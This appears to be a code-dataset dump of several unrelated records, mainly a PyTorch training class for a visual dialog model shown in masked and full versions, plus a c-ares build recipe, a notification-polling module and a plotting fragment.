bisect(self.hparams.lr_milestones, current_epoch)\n return_val = pow(self.hparams.lr_gamma, idx)\n elif current_epoch >= self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones2, current_epoch)\n return_val = self.hparams.lr_gamma * pow(self.hparams.\n lr_gamma2, idx)\n return return_val\n if self.hparams.lr_scheduler == 'LambdaLR':\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.\n hparams.initial_lr)\n self.scheduler = lr_scheduler.LambdaLR(self.optimizer,\n lr_lambda=lr_lambda_fun)\n else:\n raise NotImplementedError\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Build Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.\n hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(self.model, self.\n optimizer, self.save_dirpath, hparams=self.hparams)\n if self.hparams.load_pthpath == '':\n self.start_epoch = 1\n else:\n self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]\n [:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.\n hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print('Loaded model from {}'.format(self.hparams.load_pthpath))\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[\n 'ans_out']\n batch_loss = self.criterion(output.view(-1, output.size(-1)),\n target.view(-1).to(self.device))\n return batch_loss\n\n def train(self):\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n evaluation = Evaluation(self.hparams, model=self.model, split='val')\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n running_loss = 0.0\n train_begin = datetime.utcnow()\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n combined_dataloader = itertools.chain(self.train_dataloader)\n print(f'\\nTraining for epoch {epoch}:', 'Total Iter:', self.\n iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n accumulate_batch += batch['img_ids'].shape[0]\n if (self.hparams.virtual_batch_size == accumulate_batch or \n i == len(self.train_dataset) // self.hparams.\n train_batch_size):\n self.optimizer.step()\n if running_loss > 0.0:\n running_loss = (0.95 * running_loss + 0.05 *\n batch_loss.item())\n else:\n running_loss = batch_loss.item()\n self.optimizer.zero_grad()\n accumulate_batch = 0\n self.scheduler.step(global_iteration_step)\n global_iteration_step += 1\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.optimizer\n .param_groups[0]['lr']))\n tqdm_batch_iterator.set_description(description)\n if (global_iteration_step % self.hparams.\n tensorboard_step == 0):\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.\n optimizer.param_groups[0]['lr']))\n self._logger.info(description)\n self.summary_writer.add_scalar('train/loss',\n batch_loss, global_iteration_step)\n self.summary_writer.add_scalar('train/lr', self.\n optimizer.param_groups[0]['lr'],\n global_iteration_step)\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager\n .ckpt_dirpath, 'checkpoint_%d.pth' % epoch)\n self._logger.info(self.previous_model_path)\n if (epoch < self.hparams.num_epochs - 1 and self.hparams.\n dataset_version == '0.9'):\n continue\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path,\n global_iteration_step, self.summary_writer, os.path.join(\n self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %\n epoch))\n torch.cuda.empty_cache()\n return self.previous_model_path\n",
"step-4": "<mask token>\nos.environ['CUDA_VISIBLE_DEVICES'] = '0,1'\n<mask token>\n\n\nclass MVAN(object):\n\n def __init__(self, hparams):\n self.hparams = hparams\n self._logger = logging.getLogger(__name__)\n np.random.seed(hparams.random_seed[0])\n torch.manual_seed(hparams.random_seed[0])\n torch.cuda.manual_seed_all(hparams.random_seed[0])\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n self.device = torch.device('cuda', self.hparams.gpu_ids[0]\n ) if self.hparams.gpu_ids[0] >= 0 else torch.device('cpu')\n setproctitle(hparams.dataset_version + '_' + hparams.model_name +\n '_' + str(hparams.random_seed[0]))\n\n def _build_dataloader(self):\n old_split = 'train' if self.hparams.dataset_version == '0.9' else None\n self.train_dataset = VisDialDataset(self.hparams, overfit=self.\n hparams.overfit, split='train', old_split=old_split)\n collate_fn = None\n if 'dan' in self.hparams.img_feature_type:\n collate_fn = self.train_dataset.collate_fn\n self.train_dataloader = DataLoader(self.train_dataset, batch_size=\n self.hparams.train_batch_size, num_workers=self.hparams.\n cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # DATALOADER FINISHED\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _build_model(self):\n print('\\t* Building model...')\n encoder = Encoder(self.hparams, self.train_dataset.vocabulary)\n decoder = Decoder(self.hparams, self.train_dataset.vocabulary)\n print('Encoder: {}'.format(self.hparams.encoder))\n print('Decoder: {}'.format(self.hparams.decoder))\n if self.hparams.glove_npy != '':\n encoder.word_embed.weight.data = torch.from_numpy(np.load(self.\n hparams.glove_npy))\n print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)\n )\n decoder.word_embed = encoder.word_embed\n self.model = EncoderDecoderModel(encoder, decoder)\n self.model = self.model.to(self.device)\n if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:\n self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)\n if 'disc' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss()\n elif 'gen' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss(ignore_index=self.\n train_dataset.vocabulary.PAD_INDEX)\n if self.hparams.training_splits == 'trainval':\n self.iterations = (len(self.train_dataset) + len(self.\n valid_dataset)) // self.hparams.virtual_batch_size\n else:\n self.iterations = len(self.train_dataset\n ) // self.hparams.virtual_batch_size\n\n def lr_lambda_fun(current_iteration: int) ->float:\n \"\"\"Returns a learning rate multiplier.\n\n Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,\n and then gets multiplied by `lr_gamma` every time a milestone is crossed.\n \"\"\"\n current_epoch = float(current_iteration) / self.iterations\n if current_epoch <= self.hparams.warmup_epochs:\n alpha = current_epoch / float(self.hparams.warmup_epochs)\n return self.hparams.warmup_factor * (1.0 - alpha) + alpha\n else:\n return_val = 1.0\n if current_epoch >= self.hparams.lr_milestones[0\n ] and current_epoch < self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones, current_epoch)\n return_val = pow(self.hparams.lr_gamma, idx)\n elif current_epoch >= self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones2, current_epoch)\n return_val = self.hparams.lr_gamma * pow(self.hparams.\n lr_gamma2, idx)\n return return_val\n if self.hparams.lr_scheduler == 'LambdaLR':\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.\n hparams.initial_lr)\n self.scheduler = lr_scheduler.LambdaLR(self.optimizer,\n lr_lambda=lr_lambda_fun)\n else:\n raise NotImplementedError\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Build Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.\n hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(self.model, self.\n optimizer, self.save_dirpath, hparams=self.hparams)\n if self.hparams.load_pthpath == '':\n self.start_epoch = 1\n else:\n self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]\n [:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.\n hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print('Loaded model from {}'.format(self.hparams.load_pthpath))\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[\n 'ans_out']\n batch_loss = self.criterion(output.view(-1, output.size(-1)),\n target.view(-1).to(self.device))\n return batch_loss\n\n def train(self):\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n evaluation = Evaluation(self.hparams, model=self.model, split='val')\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n running_loss = 0.0\n train_begin = datetime.utcnow()\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n combined_dataloader = itertools.chain(self.train_dataloader)\n print(f'\\nTraining for epoch {epoch}:', 'Total Iter:', self.\n iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n accumulate_batch += batch['img_ids'].shape[0]\n if (self.hparams.virtual_batch_size == accumulate_batch or \n i == len(self.train_dataset) // self.hparams.\n train_batch_size):\n self.optimizer.step()\n if running_loss > 0.0:\n running_loss = (0.95 * running_loss + 0.05 *\n batch_loss.item())\n else:\n running_loss = batch_loss.item()\n self.optimizer.zero_grad()\n accumulate_batch = 0\n self.scheduler.step(global_iteration_step)\n global_iteration_step += 1\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.optimizer\n .param_groups[0]['lr']))\n tqdm_batch_iterator.set_description(description)\n if (global_iteration_step % self.hparams.\n tensorboard_step == 0):\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.\n optimizer.param_groups[0]['lr']))\n self._logger.info(description)\n self.summary_writer.add_scalar('train/loss',\n batch_loss, global_iteration_step)\n self.summary_writer.add_scalar('train/lr', self.\n optimizer.param_groups[0]['lr'],\n global_iteration_step)\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager\n .ckpt_dirpath, 'checkpoint_%d.pth' % epoch)\n self._logger.info(self.previous_model_path)\n if (epoch < self.hparams.num_epochs - 1 and self.hparams.\n dataset_version == '0.9'):\n continue\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path,\n global_iteration_step, self.summary_writer, os.path.join(\n self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %\n epoch))\n torch.cuda.empty_cache()\n return self.previous_model_path\n",
"step-5": "import os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1\"\nimport logging\nimport itertools\n\nimport torch\nfrom torch import nn, optim\nfrom torch.optim import lr_scheduler\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom tqdm import tqdm\nfrom setproctitle import setproctitle\nfrom bisect import bisect\n\nfrom datetime import datetime\nimport numpy as np\n\nfrom data.dataset import VisDialDataset\nfrom visdial.encoders import Encoder\nfrom visdial.decoders import Decoder\nfrom visdial.model import EncoderDecoderModel\nfrom visdial.utils.checkpointing import CheckpointManager, load_checkpoint\n\nfrom single_evaluation import Evaluation\n\nclass MVAN(object):\n def __init__(self, hparams):\n self.hparams = hparams\n self._logger = logging.getLogger(__name__)\n\n np.random.seed(hparams.random_seed[0])\n torch.manual_seed(hparams.random_seed[0])\n torch.cuda.manual_seed_all(hparams.random_seed[0])\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n\n self.device = (\n torch.device(\"cuda\", self.hparams.gpu_ids[0])\n if self.hparams.gpu_ids[0] >= 0\n else torch.device(\"cpu\")\n )\n setproctitle(hparams.dataset_version + '_' + hparams.model_name + '_' + str(hparams.random_seed[0]))\n\n # def _build_data_process(self):\n def _build_dataloader(self):\n # =============================================================================\n # SETUP DATASET, DATALOADER\n # =============================================================================\n old_split = \"train\" if self.hparams.dataset_version == \"0.9\" else None\n self.train_dataset = VisDialDataset(\n self.hparams,\n overfit=self.hparams.overfit,\n split=\"train\",\n old_split = old_split\n )\n\n collate_fn = None\n if \"dan\" in self.hparams.img_feature_type:\n collate_fn = self.train_dataset.collate_fn\n\n self.train_dataloader = DataLoader(\n self.train_dataset,\n batch_size=self.hparams.train_batch_size,\n num_workers=self.hparams.cpu_workers,\n shuffle=True,\n drop_last=True,\n collate_fn=collate_fn,\n )\n\n print(\"\"\"\n # -------------------------------------------------------------------------\n # DATALOADER FINISHED\n # -------------------------------------------------------------------------\n \"\"\")\n\n def _build_model(self):\n\n # =============================================================================\n # MODEL : Encoder, Decoder\n # =============================================================================\n\n print('\\t* Building model...')\n # Pass vocabulary to construct Embedding layer.\n encoder = Encoder(self.hparams, self.train_dataset.vocabulary)\n decoder = Decoder(self.hparams, self.train_dataset.vocabulary)\n\n print(\"Encoder: {}\".format(self.hparams.encoder))\n print(\"Decoder: {}\".format(self.hparams.decoder))\n\n # New: Initializing word_embed using GloVe\n if self.hparams.glove_npy != '':\n encoder.word_embed.weight.data = torch.from_numpy(np.load(self.hparams.glove_npy))\n print(\"Loaded glove vectors from {}\".format(self.hparams.glove_npy))\n # Share word embedding between encoder and decoder.\n decoder.word_embed = encoder.word_embed\n\n # Wrap encoder and decoder in a model.\n self.model = EncoderDecoderModel(encoder, decoder)\n self.model = self.model.to(self.device)\n # Use Multi-GPUs\n if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:\n self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)\n\n # =============================================================================\n # CRITERION\n # =============================================================================\n if \"disc\" in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss()\n\n elif \"gen\" in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss(ignore_index=self.train_dataset.vocabulary.PAD_INDEX)\n\n # Total Iterations -> for learning rate scheduler\n if self.hparams.training_splits == \"trainval\":\n self.iterations = (len(self.train_dataset) + len(self.valid_dataset)) // self.hparams.virtual_batch_size\n else:\n self.iterations = len(self.train_dataset) // self.hparams.virtual_batch_size\n\n # =============================================================================\n # OPTIMIZER, SCHEDULER\n # =============================================================================\n\n def lr_lambda_fun(current_iteration: int) -> float:\n \"\"\"Returns a learning rate multiplier.\n\n Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,\n and then gets multiplied by `lr_gamma` every time a milestone is crossed.\n \"\"\"\n current_epoch = float(current_iteration) / self.iterations\n if current_epoch <= self.hparams.warmup_epochs:\n alpha = current_epoch / float(self.hparams.warmup_epochs)\n return self.hparams.warmup_factor * (1.0 - alpha) + alpha\n else:\n return_val = 1.0\n if current_epoch >= self.hparams.lr_milestones[0] and current_epoch < self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones, current_epoch)\n return_val = pow(self.hparams.lr_gamma, idx)\n elif current_epoch >= self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones2, current_epoch)\n return_val = self.hparams.lr_gamma * pow(self.hparams.lr_gamma2, idx)\n return return_val\n\n if self.hparams.lr_scheduler == \"LambdaLR\":\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.hparams.initial_lr)\n self.scheduler = lr_scheduler.LambdaLR(self.optimizer, lr_lambda=lr_lambda_fun)\n else:\n raise NotImplementedError\n\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Build Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(\n self.model, self.optimizer, self.save_dirpath, hparams=self.hparams\n )\n\n # If loading from checkpoint, adjust start epoch and load parameters.\n if self.hparams.load_pthpath == \"\":\n self.start_epoch = 1\n else:\n # \"path/to/checkpoint_xx.pth\" -> xx\n self.start_epoch = int(self.hparams.load_pthpath.split(\"_\")[-1][:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print(\"Loaded model from {}\".format(self.hparams.load_pthpath))\n\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = (batch[\"ans_ind\"] if \"disc\" in self.hparams.decoder else batch[\"ans_out\"])\n batch_loss = self.criterion(output.view(-1, output.size(-1)), target.view(-1).to(self.device))\n\n return batch_loss\n\n def train(self):\n\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n\n # Evaluation Setup\n evaluation = Evaluation(self.hparams, model=self.model, split=\"val\")\n\n # Forever increasing counter to keep track of iterations (for tensorboard log).\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n\n running_loss = 0.0 # New\n train_begin = datetime.utcnow() # New\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n # -------------------------------------------------------------------------\n # ON EPOCH START (combine dataloaders if training on train + val)\n # -------------------------------------------------------------------------\n combined_dataloader = itertools.chain(self.train_dataloader)\n\n print(f\"\\nTraining for epoch {epoch}:\", \"Total Iter:\", self.iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0 # taesun New\n\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n\n accumulate_batch += batch[\"img_ids\"].shape[0]\n if self.hparams.virtual_batch_size == accumulate_batch \\\n or i == (len(self.train_dataset) // self.hparams.train_batch_size): # last batch\n\n self.optimizer.step()\n\n # --------------------------------------------------------------------\n # Update running loss and decay learning rates\n # --------------------------------------------------------------------\n if running_loss > 0.0:\n running_loss = 0.95 * running_loss + 0.05 * batch_loss.item()\n else:\n running_loss = batch_loss.item()\n\n self.optimizer.zero_grad()\n accumulate_batch = 0\n\n self.scheduler.step(global_iteration_step)\n\n global_iteration_step += 1\n # torch.cuda.empty_cache()\n description = \"[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]\".format(\n datetime.utcnow() - train_begin,\n epoch,\n global_iteration_step, running_loss,\n self.optimizer.param_groups[0]['lr'])\n tqdm_batch_iterator.set_description(description)\n\n # tensorboard\n if global_iteration_step % self.hparams.tensorboard_step == 0:\n description = \"[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]\".format(\n datetime.utcnow() - train_begin,\n epoch,\n global_iteration_step, running_loss,\n self.optimizer.param_groups[0]['lr'],\n )\n self._logger.info(description)\n # tensorboard writing scalar\n self.summary_writer.add_scalar(\n \"train/loss\", batch_loss, global_iteration_step\n )\n self.summary_writer.add_scalar(\n \"train/lr\", self.optimizer.param_groups[0][\"lr\"], global_iteration_step\n )\n\n # -------------------------------------------------------------------------\n # ON EPOCH END (checkpointing and validation)\n # -------------------------------------------------------------------------\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager.ckpt_dirpath, \"checkpoint_%d.pth\" % (epoch))\n self._logger.info(self.previous_model_path)\n\n if epoch < self.hparams.num_epochs - 1 and self.hparams.dataset_version == '0.9':\n continue\n\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path, global_iteration_step, self.summary_writer,\n os.path.join(self.checkpoint_manager.ckpt_dirpath, \"ranks_%d_valid.json\" % epoch))\n torch.cuda.empty_cache()\n\n return self.previous_model_path",
"step-ids": [
4,
6,
7,
8,
10
]
}
|
[
4,
6,
7,
8,
10
] |
from .base import GnuRecipe
class CAresRecipe(GnuRecipe):
def __init__(self, *args, **kwargs):
super(CAresRecipe, self).__init__(*args, **kwargs)
self.sha256 = '45d3c1fd29263ceec2afc8ff9cd06d5f' \
'8f889636eb4e80ce3cc7f0eaf7aadc6e'
self.name = 'c-ares'
self.version = '1.14.0'
self.url = 'https://c-ares.haxx.se/download/$name-$version.tar.gz'
|
normal
|
{
"blob_id": "bf7676dc2c47d9cd2f1ce2d436202ae2c5061265",
"index": 8634,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass CAresRecipe(GnuRecipe):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass CAresRecipe(GnuRecipe):\n\n def __init__(self, *args, **kwargs):\n super(CAresRecipe, self).__init__(*args, **kwargs)\n self.sha256 = (\n '45d3c1fd29263ceec2afc8ff9cd06d5f8f889636eb4e80ce3cc7f0eaf7aadc6e')\n self.name = 'c-ares'\n self.version = '1.14.0'\n self.url = 'https://c-ares.haxx.se/download/$name-$version.tar.gz'\n",
"step-4": "from .base import GnuRecipe\n\n\nclass CAresRecipe(GnuRecipe):\n\n def __init__(self, *args, **kwargs):\n super(CAresRecipe, self).__init__(*args, **kwargs)\n self.sha256 = (\n '45d3c1fd29263ceec2afc8ff9cd06d5f8f889636eb4e80ce3cc7f0eaf7aadc6e')\n self.name = 'c-ares'\n self.version = '1.14.0'\n self.url = 'https://c-ares.haxx.se/download/$name-$version.tar.gz'\n",
"step-5": "from .base import GnuRecipe\n\n\nclass CAresRecipe(GnuRecipe):\n def __init__(self, *args, **kwargs):\n super(CAresRecipe, self).__init__(*args, **kwargs)\n self.sha256 = '45d3c1fd29263ceec2afc8ff9cd06d5f' \\\n '8f889636eb4e80ce3cc7f0eaf7aadc6e'\n self.name = 'c-ares'\n self.version = '1.14.0'\n self.url = 'https://c-ares.haxx.se/download/$name-$version.tar.gz'\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import calendar
import json
from datetime import datetime
from datapoller.download import download
from datapoller.settings import *
from messaging.Messaging import sendMessage
from messaging.settings import RABBIT_NOTIFY_QUEUE
from sessioncontroller.utils import is_level_interesting_for_kp
__author__ = 'arik'
sharedDict = {}
def registerModelStorage(dict):
global sharedDict
sharedDict = dict
def updateModel():
(lastLevels, validTime) = download(NOWCAST_DATA_URL)
sharedDict['lastLevels'] = lastLevels
sharedDict['validTime'] = validTime
def hasValidModel():
lastLevels = sharedDict.get('lastLevels')
validTime = sharedDict.get('validTime')
return lastLevels is not None and validTime is not None and \
getTimestamp(validTime) >= getTimestamp(datetime.utcnow())
def processUserLocation(geo_id, geo, kp_level, chat_id, bot):
if hasValidModel() is False:
return
lastLevels = sharedDict.get('lastLevels')
validTime = sharedDict.get('validTime')
level = lastLevels[geo_id]
if kp_level is None or is_level_interesting_for_kp(level, kp_level):
sendMessage(
RABBIT_NOTIFY_QUEUE,
json.dumps({"time": getTimestamp(validTime), "geo": geo, "chat_id": chat_id, "level": level, "bot": bot})
)
def getTimestamp(datetime):
return calendar.timegm(datetime.timetuple())
|
normal
|
{
"blob_id": "e8f090a02bfd5ee8a6832351357594af2d6692f9",
"index": 8702,
"step-1": "<mask token>\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\n\ndef updateModel():\n lastLevels, validTime = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\n<mask token>\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-2": "<mask token>\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\n\ndef updateModel():\n lastLevels, validTime = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\n<mask token>\n\n\ndef processUserLocation(geo_id, geo, kp_level, chat_id, bot):\n if hasValidModel() is False:\n return\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n level = lastLevels[geo_id]\n if kp_level is None or is_level_interesting_for_kp(level, kp_level):\n sendMessage(RABBIT_NOTIFY_QUEUE, json.dumps({'time': getTimestamp(\n validTime), 'geo': geo, 'chat_id': chat_id, 'level': level,\n 'bot': bot}))\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-3": "<mask token>\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\n\ndef updateModel():\n lastLevels, validTime = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\ndef hasValidModel():\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n return lastLevels is not None and validTime is not None and getTimestamp(\n validTime) >= getTimestamp(datetime.utcnow())\n\n\ndef processUserLocation(geo_id, geo, kp_level, chat_id, bot):\n if hasValidModel() is False:\n return\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n level = lastLevels[geo_id]\n if kp_level is None or is_level_interesting_for_kp(level, kp_level):\n sendMessage(RABBIT_NOTIFY_QUEUE, json.dumps({'time': getTimestamp(\n validTime), 'geo': geo, 'chat_id': chat_id, 'level': level,\n 'bot': bot}))\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-4": "<mask token>\n__author__ = 'arik'\nsharedDict = {}\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\n\ndef updateModel():\n lastLevels, validTime = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\ndef hasValidModel():\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n return lastLevels is not None and validTime is not None and getTimestamp(\n validTime) >= getTimestamp(datetime.utcnow())\n\n\ndef processUserLocation(geo_id, geo, kp_level, chat_id, bot):\n if hasValidModel() is False:\n return\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n level = lastLevels[geo_id]\n if kp_level is None or is_level_interesting_for_kp(level, kp_level):\n sendMessage(RABBIT_NOTIFY_QUEUE, json.dumps({'time': getTimestamp(\n validTime), 'geo': geo, 'chat_id': chat_id, 'level': level,\n 'bot': bot}))\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-5": "import calendar\nimport json\nfrom datetime import datetime\nfrom datapoller.download import download\nfrom datapoller.settings import *\nfrom messaging.Messaging import sendMessage\nfrom messaging.settings import RABBIT_NOTIFY_QUEUE\nfrom sessioncontroller.utils import is_level_interesting_for_kp\n\n__author__ = 'arik'\n\nsharedDict = {}\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\ndef updateModel():\n (lastLevels, validTime) = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\ndef hasValidModel():\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n return lastLevels is not None and validTime is not None and \\\n getTimestamp(validTime) >= getTimestamp(datetime.utcnow())\n\n\ndef processUserLocation(geo_id, geo, kp_level, chat_id, bot):\n if hasValidModel() is False:\n return\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n level = lastLevels[geo_id]\n if kp_level is None or is_level_interesting_for_kp(level, kp_level):\n sendMessage(\n RABBIT_NOTIFY_QUEUE,\n json.dumps({\"time\": getTimestamp(validTime), \"geo\": geo, \"chat_id\": chat_id, \"level\": level, \"bot\": bot})\n )\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-ids": [
3,
4,
5,
6,
8
]
}
|
[
3,
4,
5,
6,
8
] |
<|reserved_special_token_0|>
def mat_line(speed_time_info, interface, direction, last_time):
fig = plt.figure(figsize=(6, 6))
ax = fig.add_subplot(111)
import matplotlib.dates as mdate
ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))
import matplotlib.ticker as mtick
